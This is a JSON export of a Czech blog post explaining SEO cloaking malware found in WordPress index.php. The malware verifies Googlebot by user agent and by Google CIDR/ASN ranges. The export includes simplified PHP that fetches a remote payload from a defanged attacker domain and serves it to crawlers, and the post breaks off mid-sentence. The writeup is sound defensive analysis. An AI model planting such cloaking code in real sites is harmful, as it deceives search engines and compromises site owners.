{"id":76,"date":"2026-01-13T00:00:00","date_gmt":"2026-01-12T23:00:00","guid":{"rendered":"https:\/\/helloblog.io\/cs\/kdyz-malware-krmi-googlebot-selektivni-cloaking-asn-cidr-wordpress\/"},"modified":"2026-01-20T06:32:57","modified_gmt":"2026-01-20T05:32:57","slug":"kdyz-malware-krmi-googlebot-selektivni-cloaking-asn-cidr-wordpress","status":"publish","type":"post","link":"https:\/\/helloblog.io\/cs\/kdyz-malware-krmi-googlebot-selektivni-cloaking-asn-cidr-wordpress\/","title":{"rendered":"Kdy\u017e malware \u201ekrm\u00ed\u201c Googlebot: selektivn\u00ed cloaking s ov\u011b\u0159en\u00edm IP p\u0159es ASN a CIDR ve WordPressu"},"content":{"rendered":"\n<p>V posledn\u00ed dob\u011b nar\u00e1\u017e\u00edm na zaj\u00edmav\u00fd posun v \u201eSEO malwaru\u201c: nejde o agresivn\u00ed p\u0159esm\u011brov\u00e1n\u00ed, kter\u00e9 si v\u0161imne\u0161 hned. \u00dato\u010dn\u00edk rad\u011bji potichu uprav\u00ed vstupn\u00ed bod webu (typicky <code>index.php<\/code>) a za\u010dne rozhodovat, komu uk\u00e1\u017ee jakou verzi str\u00e1nky. B\u011b\u017en\u00ed u\u017eivatel\u00e9 vid\u00ed \u010dist\u00fd web. Vyhled\u00e1va\u010d ale dostane \u00fapln\u011b jin\u00fd obsah \u2013 \u010dasto spam nebo doorway str\u00e1nky \u2013 kter\u00e9 maj\u00ed ovlivnit indexaci a reputaci dom\u00e9ny.<\/p>\n\n\n\n<p>Konkr\u00e9tn\u00ed incident popsan\u00fd Sucuri je zaj\u00edmav\u00fd t\u00edm, \u017ee \u00fato\u010dn\u00edk neov\u011b\u0159oval Googlebot jen podle <code>User-Agent<\/code> hlavi\u010dky (to jde snadno podvrhnout), ale nav\u00edc kontroloval, jestli IP adresa n\u00e1v\u0161t\u011bvn\u00edka opravdu pat\u0159\u00ed do IP rozsah\u016f Googlu. A to velmi technicky: p\u0159es seznam ASN rozsah\u016f v CIDR a bitov\u00e9 operace, v\u010detn\u011b podpory IPv6.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Co bylo kompromitovan\u00e9: WordPress <code>index.php<\/code> jako \u201evr\u00e1tn\u00fd\u201c<\/h2>\n\n\n\n<p>V popsan\u00e9m p\u0159\u00edpad\u011b byl injektovan\u00fd k\u00f3d p\u0159\u00edmo v hlavn\u00edm <code>index.php<\/code> WordPressu. To je pro \u00fato\u010dn\u00edka ide\u00e1ln\u00ed m\u00edsto: jde o soubor, kter\u00fdm projde v\u011bt\u0161ina po\u017eadavk\u016f, a z\u00e1rove\u0148 m\u016f\u017ee skript p\u0159i \u201enezaj\u00edmav\u00e9m\u201c n\u00e1v\u0161t\u011bvn\u00edkovi nen\u00e1padn\u011b p\u0159edat \u0159\u00edzen\u00ed standardn\u00edmu bootstrappingu WordPressu.<\/p>\n\n\n\n<p>V\u00fdsledek je klasick\u00fd cloaking (maskov\u00e1n\u00ed): Google vid\u00ed jin\u00fd obsah ne\u017e \u010dlov\u011bk. Jen\u017ee realizace je mnohem selektivn\u011bj\u0161\u00ed a h\u016f\u0159 se odhaluje b\u011b\u017en\u00fdm ru\u010dn\u00edm testov\u00e1n\u00edm.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1360\" height=\"636\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic.png\" alt=\"Sch\u00e9ma selektivn\u00edho doru\u010dov\u00e1n\u00ed obsahu s ov\u011b\u0159en\u00edm IP (IP-verified conditional logic)\" class=\"wp-image-70\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic.png 1360w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-300x140.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-1024x479.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-768x359.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/IP-Verified-Conditional-Logic-400x187.png 400w\" sizes=\"auto, (max-width: 1360px) 100vw, 1360px\" \/><figcaption class=\"wp-element-caption\">\u00dato\u010dn\u00edk rozhoduje podle identity n\u00e1v\u0161t\u011bvn\u00edka, zda zobraz\u00ed \u010dist\u00fd web, nebo vzd\u00e1len\u00fd payload. \u2014 <em>Forr\u00e1s: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Pro\u010d nesta\u010d\u00ed kontrola <code>User-Agent<\/code> a pro\u010d \u00fato\u010dn\u00edci sahaj\u00ed po ASN<\/h2>\n\n\n\n<p><code>User-Agent<\/code> je textov\u00fd \u0159et\u011bzec pos\u00edlan\u00fd klientem (prohl\u00ed\u017ee\u010dem nebo crawlerem) v HTTP po\u017eadavku. Weby ho b\u011b\u017en\u011b pou\u017e\u00edvaj\u00ed pro anal\u00fdzu, personalizaci nebo kompatibilitu. Z pohledu \u00fato\u010dn\u00edka je to ale jen prvn\u00ed filtr \u2013 a hlavn\u011b je trivi\u00e1ln\u011b spoofovateln\u00fd.<\/p>\n\n\n\n<p>Proto v tomto incidentu n\u00e1sledovalo druh\u00e9 s\u00edto: ov\u011b\u0159en\u00ed, \u017ee IP adresa opravdu pat\u0159\u00ed do Google infrastruktury. V praxi to \u00fato\u010dn\u00edk \u0159e\u0161il tak, \u017ee m\u011bl v k\u00f3du \u201ezadr\u00e1tovan\u00fd\u201c seznam IP rozsah\u016f asociovan\u00fdch s Google ASN (Autonomous System Number). ASN si m\u016f\u017ee\u0161 p\u0159edstavit jako internetovou identitu organizace: seskupuje IP adresy, kter\u00e9 dan\u00fd subjekt provozuje.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CIDR v kostce (a pro\u010d je pro malware praktick\u00fd)<\/h3>\n\n\n\n<p>CIDR (Classless Inter-Domain Routing) je z\u00e1pis rozsahu IP adres, typicky ve tvaru <code>192.168.1.0\/24<\/code>. M\u00edsto vyjmenov\u00e1n\u00ed v\u0161ech adres \u0159\u00edk\u00e1, jak velk\u00fd blok to je. Pro \u00fato\u010dn\u00edka je to ide\u00e1ln\u00ed: sta\u010d\u00ed ulo\u017eit n\u011bkolik des\u00edtek\/stovek CIDR rozsah\u016f a otestovat, jestli IP n\u00e1v\u0161t\u011bvn\u00edka do n\u011bkter\u00e9ho spad\u00e1.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1332\" height=\"620\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format.png\" alt=\"Uk\u00e1zka CIDR form\u00e1tu pro definici rozsah\u016f IP adres\" class=\"wp-image-71\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format.png 1332w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-300x140.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-1024x477.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-768x357.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/CIDR-format-400x186.png 400w\" sizes=\"auto, (max-width: 1332px) 100vw, 1332px\" \/><figcaption class=\"wp-element-caption\">CIDR z\u00e1pis vyjad\u0159uje blok adres kompaktn\u011b, bez ru\u010dn\u00edho vyjmenov\u00e1n\u00ed. \u2014 <em>Forr\u00e1s: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Co je na tomhle \u00fatoku \u201enov\u00e9\u201c: bitov\u00e9 ov\u011b\u0159ov\u00e1n\u00ed rozsahu a IPv6<\/h2>\n\n\n\n<p>Spousta cloaking skript\u016f d\u011bl\u00e1 primitivn\u00ed kontrolu typu \u201eobsahuje <code>User-Agent<\/code> \u0159et\u011bzec Googlebot?\u201c. Tady \u0161el \u00fato\u010dn\u00edk d\u00e1l: ov\u011b\u0159oval IP adresu matematicky tak, aby p\u0159esn\u011b sed\u011bla do s\u00ed\u0165ov\u00e9ho bloku. Pro IPv4 pou\u017e\u00edval bitov\u00e9 operace (AND s netmaskou) \u2013 tedy robustn\u00ed test, kter\u00fd se b\u011b\u017en\u011b pou\u017e\u00edv\u00e1 i v s\u00ed\u0165ov\u00fdch n\u00e1stroj\u00edch.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#24292e\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#e1e4e8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;?php\n\/\/ Pseudok\u00f3d \/ zjednodu\u0161en\u00e9 sch\u00e9ma logiky z incidentu:\n\n$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';\n$ip        = $_SERVER['REMOTE_ADDR'] ?? '';\n\n\/\/ 1) Prvn\u00ed filtr: User-Agent (snadno spoofovateln\u00fd)\n$isGoogleUA = preg_match('~Googlebot|Google-InspectionTool|Google-Site-Verification~i', $userAgent);\n\n\/\/ 2) Druh\u00fd filtr: IP mus\u00ed spadat do Google ASN rozsah\u016f v CIDR\n\/\/ (v incidentu byl seznam rozs\u00e1hl\u00fd a zadr\u00e1tovan\u00fd p\u0159\u00edmo v souboru)\n$isGoogleIP = ip_in_cidr_ranges($ip, $googleCidrs);\n\nif ($isGoogleUA &amp;&amp; $isGoogleIP) {\n    \/\/ 3) Pro ov\u011b\u0159en\u00e9ho bota st\u00e1hnout vzd\u00e1len\u00fd obsah a poslat ho jako \u201enativn\u00ed\u201c HTML\n    $payload = curl_fetch('hxxps:\/\/amp-samaresmanor[.]pages[.]dev');\n    if ($payload) {\n        echo $payload;\n        exit;\n    }\n\n    \/\/ 4) Fail-safe: kdy\u017e payload sel\u017ee, neukazovat botovi rozbitou str\u00e1nku\n    header('Location: \/home\/');\n    exit;\n}\n\n\/\/ 5) Pro b\u011b\u017en\u00e9 u\u017eivatele: standardn\u00ed WordPress\nrequire_once __DIR__ . '\/wp-blog-header.php';\n\n<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki github-dark\" style=\"background-color:#24292e;color:#e1e4e8\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color:#F97583\">&#x3C;?<\/span><span style=\"color:#79B8FF\">php<\/span><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ Pseudok\u00f3d \/ zjednodu\u0161en\u00e9 sch\u00e9ma logiky z incidentu:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$userAgent <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#E1E4E8\"> $_SERVER[<\/span><span style=\"color:#9ECBFF\">'HTTP_USER_AGENT'<\/span><span style=\"color:#E1E4E8\">] <\/span><span style=\"color:#F97583\">??<\/span><span style=\"color:#9ECBFF\"> ''<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$ip        <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#E1E4E8\"> $_SERVER[<\/span><span style=\"color:#9ECBFF\">'REMOTE_ADDR'<\/span><span style=\"color:#E1E4E8\">] <\/span><span style=\"color:#F97583\">??<\/span><span style=\"color:#9ECBFF\"> ''<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ 1) Prvn\u00ed filtr: User-Agent (snadno spoofovateln\u00fd)<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$isGoogleUA <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#79B8FF\"> preg_match<\/span><span style=\"color:#E1E4E8\">(<\/span><span style=\"color:#9ECBFF\">'~Googlebot|Google-InspectionTool|Google-Site-Verification~i'<\/span><span style=\"color:#E1E4E8\">, $userAgent);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ 2) Druh\u00fd filtr: IP mus\u00ed spadat do Google ASN rozsah\u016f v CIDR<\/span><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ (v incidentu byl seznam rozs\u00e1hl\u00fd a zadr\u00e1tovan\u00fd p\u0159\u00edmo v souboru)<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">$isGoogleIP <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#B392F0\"> ip_in_cidr_ranges<\/span><span style=\"color:#E1E4E8\">($ip, $googleCidrs);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">if<\/span><span style=\"color:#E1E4E8\"> ($isGoogleUA <\/span><span style=\"color:#F97583\">&#x26;&#x26;<\/span><span style=\"color:#E1E4E8\"> $isGoogleIP) {<\/span><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">    \/\/ 3) Pro ov\u011b\u0159en\u00e9ho bota st\u00e1hnout vzd\u00e1len\u00fd obsah a poslat ho jako \u201enativn\u00ed\u201c HTML<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">    $payload <\/span><span style=\"color:#F97583\">=<\/span><span style=\"color:#B392F0\"> curl_fetch<\/span><span style=\"color:#E1E4E8\">(<\/span><span style=\"color:#9ECBFF\">'hxxps:\/\/amp-samaresmanor[.]pages[.]dev'<\/span><span style=\"color:#E1E4E8\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">    if<\/span><span style=\"color:#E1E4E8\"> ($payload) {<\/span><\/span>\n<span class=\"line\"><span style=\"color:#79B8FF\">        echo<\/span><span style=\"color:#E1E4E8\"> $payload;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">        exit<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">    }<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">    \/\/ 4) Fail-safe: kdy\u017e payload sel\u017ee, neukazovat botovi rozbitou str\u00e1nku<\/span><\/span>\n<span class=\"line\"><span style=\"color:#79B8FF\">    header<\/span><span style=\"color:#E1E4E8\">(<\/span><span style=\"color:#9ECBFF\">'Location: \/home\/'<\/span><span style=\"color:#E1E4E8\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">    exit<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color:#E1E4E8\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color:#6A737D\">\/\/ 5) Pro b\u011b\u017en\u00e9 u\u017eivatele: standardn\u00ed WordPress<\/span><\/span>\n<span class=\"line\"><span style=\"color:#F97583\">require_once<\/span><span style=\"color:#79B8FF\"> __DIR__<\/span><span style=\"color:#F97583\"> .<\/span><span style=\"color:#9ECBFF\"> '\/wp-blog-header.php'<\/span><span style=\"color:#E1E4E8\">;<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Kl\u00ed\u010dov\u00e1 \u010d\u00e1st je kontrola \u201eIP \u2208 CIDR rozsah\u201c. V anal\u00fdze Sucuri je zm\u00edn\u011bn\u00e1 logika ve stylu bitov\u00e9ho porovn\u00e1n\u00ed (u IPv4) \u2013 v principu jde o to, \u017ee se IP adresa i s\u00ed\u0165ov\u00e1 adresa \u201eo\u0159\u00edznou\u201c netmaskou a porovnaj\u00ed. Skript nav\u00edc po\u010d\u00edtal i s IPv6, co\u017e je detail, kter\u00fd star\u0161\u00ed malware \u010dasto ignoruje, a t\u00edm je jednodu\u0161\u0161\u00ed odhalit.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1420\" height=\"734\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation.png\" alt=\"Diagram validace IP rozsahu pomoc\u00ed bitov\u00fdch operac\u00ed\" class=\"wp-image-72\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation.png 1420w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-300x155.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-1024x529.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-768x397.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Bitwise-IP-Range-Validation-400x207.png 400w\" sizes=\"auto, (max-width: 1420px) 100vw, 1420px\" \/><figcaption class=\"wp-element-caption\">Nam\u00edsto string matchingu jde o p\u0159esnou s\u00ed\u0165ovou matematiku nad IP a netmaskou. \u2014 <em>Forr\u00e1s: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Doru\u010den\u00ed payloadu: cURL a vzd\u00e1len\u00fd obsah jako \u201enativn\u00ed\u201c str\u00e1nka<\/h2>\n\n\n\n<p>Po \u00fasp\u011b\u0161n\u00e9m ov\u011b\u0159en\u00ed identity (Google <code>User-Agent<\/code> + IP v Google rozsaz\u00edch) malware st\u00e1hl obsah z extern\u00edho endpointu p\u0159es cURL a rovnou ho vypsal do response. Z pohledu crawleru to vypad\u00e1, jako by dan\u00fd spam\/doorway obsah hostoval p\u0159\u00edmo napaden\u00fd web.<\/p>\n\n\n\n<p>V incidentu se zmi\u0148uje konkr\u00e9tn\u00ed dom\u00e9na <code>amp-samaresmanor[.]pages[.]dev<\/code> (ve zdroj\u00edch je uvedeno, \u017ee byla v dob\u011b psan\u00ed blocklistovan\u00e1 vybran\u00fdmi bezpe\u010dnostn\u00edmi vendor y). D\u016fle\u017eit\u00e9 je, \u017ee tento typ kampan\u011b m\u016f\u017ee endpointy rotovat \u2013 tak\u017ee samotn\u00e9 blokov\u00e1n\u00ed jedn\u00e9 dom\u00e9ny nen\u00ed syst\u00e9mov\u00e9 \u0159e\u0161en\u00ed.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1444\" height=\"836\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL.png\" alt=\"Sch\u00e9ma sta\u017een\u00ed vzd\u00e1len\u00e9ho payloadu p\u0159es cURL a jeho vlo\u017een\u00ed do str\u00e1nky\" class=\"wp-image-73\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL.png 1444w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-300x174.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-1024x593.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-768x445.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Remote-Payload-Execution-via-cURL-400x232.png 400w\" sizes=\"auto, (max-width: 1444px) 100vw, 1444px\" \/><figcaption class=\"wp-element-caption\">Bot dostane obsah z extern\u00edho zdroje, kter\u00fd se tv\u00e1\u0159\u00ed jako sou\u010d\u00e1st webu. \u2014 <em>Forr\u00e1s: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Filtrace Google ekosyst\u00e9mu: nejde jen o \u201eGooglebot\u201c<\/h2>\n\n\n\n<p>Dal\u0161\u00ed detail, kter\u00fd d\u00e1v\u00e1 smysl: \u00fato\u010dn\u00edk nec\u00edlil jen na \u0159et\u011bzec \u201eGooglebot\u201c. Zahrnul i r\u016fzn\u00e9 identifik\u00e1tory souvisej\u00edc\u00ed s kontroln\u00edmi n\u00e1stroji, verifikac\u00ed webu nebo API crawlery. C\u00edl je jasn\u00fd \u2013 zajistit, aby se podvr\u017een\u00fd obsah dostal do indexu a z\u00e1rove\u0148 pro\u0161el intern\u00edmi kontrolami Googlu.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1682\" height=\"554\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering.png\" alt=\"Uk\u00e1zka filtrov\u00e1n\u00ed User-Agent\u016f v malwaru pro r\u016fzn\u00e9 Google crawler a n\u00e1stroje\" class=\"wp-image-74\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering.png 1682w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-300x99.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-1024x337.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-768x253.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-1536x506.png 1536w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/User-Agent-Filtering-400x132.png 400w\" sizes=\"auto, (max-width: 1682px) 100vw, 1682px\" \/><figcaption class=\"wp-element-caption\">\u0160ir\u0161\u00ed seznam User-Agent\u016f zvy\u0161uje \u0161anci, \u017ee spam projde indexac\u00ed i verifikac\u00ed. \u2014 <em>Forr\u00e1s: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Rozhodovac\u00ed logika a logov\u00e1n\u00ed: \u00fato\u010dn\u00edk chce zp\u011btnou vazbu<\/h2>\n\n\n\n<p>Tohle nen\u00ed \u201ejednor\u00e1zov\u00fd\u201c skript. Podle popisu m\u011bl \u00fato\u010dn\u00edk i o\u0161et\u0159en\u00ed chyb a logov\u00e1n\u00ed, aby vid\u011bl, kdy se poda\u0159ilo serv\u00edrovat payload, a kdy naopak n\u011bkdo zkou\u0161el podvrhnout Google <code>User-Agent<\/code>, ale nesed\u011bla IP.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li>Legitimn\u00ed bot (UA + IP sed\u00ed): zobraz\u00ed vzd\u00e1len\u00fd obsah; pokud se nepoda\u0159\u00ed st\u00e1hnout, p\u0159esm\u011bruje na <code>\/home\/<\/code>, aby Google nevid\u011bl chybu.<\/li>\n\n\n<li>Fake bot (UA sed\u00ed, IP nesed\u00ed): zaloguje pokus a p\u0159esm\u011bruje na legitimn\u00ed obsah, aby anal\u00fdza byla t\u011b\u017e\u0161\u00ed.<\/li>\n\n\n<li>B\u011b\u017en\u00ed u\u017eivatel\u00e9: typicky okam\u017eit\u011b uvid\u00ed standardn\u00ed web (nebo jsou p\u0159esm\u011brov\u00e1ni na \u201e\u010distou\u201c landing page).<\/li>\n\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1694\" height=\"680\" src=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging.png\" alt=\"Rozhodovac\u00ed strom malwaru: ov\u011b\u0159en\u00ed User-Agent, ov\u011b\u0159en\u00ed IP, sta\u017een\u00ed payloadu, fallback a logov\u00e1n\u00ed\" class=\"wp-image-75\" srcset=\"https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging.png 1694w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-300x120.png 300w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-1024x411.png 1024w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-768x308.png 768w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-1536x617.png 1536w, https:\/\/helloblog.io\/app\/uploads\/sites\/11\/2026\/01\/Conditional-Logic-and-Error-Logging-400x161.png 400w\" sizes=\"auto, (max-width: 1694px) 100vw, 1694px\" \/><figcaption class=\"wp-element-caption\">V\u00edce vrstev kontroly minimalizuje \u0161anci, \u017ee si probl\u00e9mu v\u0161imne\u0161 p\u0159i b\u011b\u017en\u00e9 n\u00e1v\u0161t\u011bv\u011b. \u2014 <em>Forr\u00e1s: Sucuri Blog<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Pro\u010d se to dot\u00fdk\u00e1 hlavn\u011b SEO (a pro\u010d je to probl\u00e9m i pro v\u00fdvoj\u00e1\u0159e)<\/h2>\n\n\n\n<p>Dopad je prim\u00e1rn\u011b reputa\u010dn\u00ed a SEO: web za\u010dne vyhled\u00e1va\u010di serv\u00edrovat n\u011bco, co s n\u00edm nesouvis\u00ed. N\u00e1sledky b\u00fdvaj\u00ed tvrd\u00e9 \u2013 od zhor\u0161en\u00ed v\u00fdsledk\u016f vyhled\u00e1v\u00e1n\u00ed a\u017e po blacklist nebo deindexaci. Z\u00e1rove\u0148 plat\u00ed, \u017ee takov\u00fd \u00fatok se detekuje pozd\u011b, proto\u017ee majitel webu p\u0159i ru\u010dn\u00ed kontrole vid\u00ed \u201ev\u0161echno v po\u0159\u00e1dku\u201c.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Varovn\u00e9 sign\u00e1ly: co zkontrolovat jako prvn\u00ed<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li>Divn\u00e9 v\u00fdsledky v Google (ne\u010dekan\u00e9 title\/description, cizojazy\u010dn\u00fd spam, podivn\u00e9 landing pages).<\/li>\n\n\n<li>Ned\u00e1vno zm\u011bn\u011bn\u00e9 core soubory \u2013 hlavn\u011b <code>index.php<\/code> a dal\u0161\u00ed vstupn\u00ed body.<\/li>\n\n\n<li>Podez\u0159el\u00e9 extern\u00ed URL v k\u00f3du a v serverov\u00fdch log\u00e1ch (nap\u0159. vol\u00e1n\u00ed na nezn\u00e1m\u00e9 dom\u00e9ny).<\/li>\n\n\n<li>Neo\u010dek\u00e1van\u00e9 z\u00e1znamy v log\u00e1ch (redirecty, cURL requesty, \u201efake bot\u201c hl\u00e1\u0161ky apod.).<\/li>\n\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Jak to funguje ve vztahu k WordPress core soubor\u016fm<\/h2>\n\n\n\n<p>Z pohledu WordPressu je zaj\u00edmav\u00e9, jak \u00fato\u010dn\u00edk balancuje mezi \u0161kodlivou logikou a zachov\u00e1n\u00edm funk\u010dnosti webu. V popsan\u00e9 variant\u011b si malware pom\u00e1hal i standardn\u00edmi soubory:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n\n<li><code>wp-load.php<\/code>: jeho includov\u00e1n\u00ed \u201enastartuje\u201c WordPress prost\u0159ed\u00ed (konfigurace, DB p\u0159ipojen\u00ed, constants), co\u017e \u00fato\u010dn\u00edkovi otev\u00edr\u00e1 dve\u0159e k dal\u0161\u00edm mo\u017enostem.<\/li>\n\n\n<li><code>wp-blog-header.php<\/code>: typick\u00fd z\u00e1v\u011br \u010dist\u00e9ho <code>index.php<\/code> \u2013 pokud skript rozhodne, \u017ee 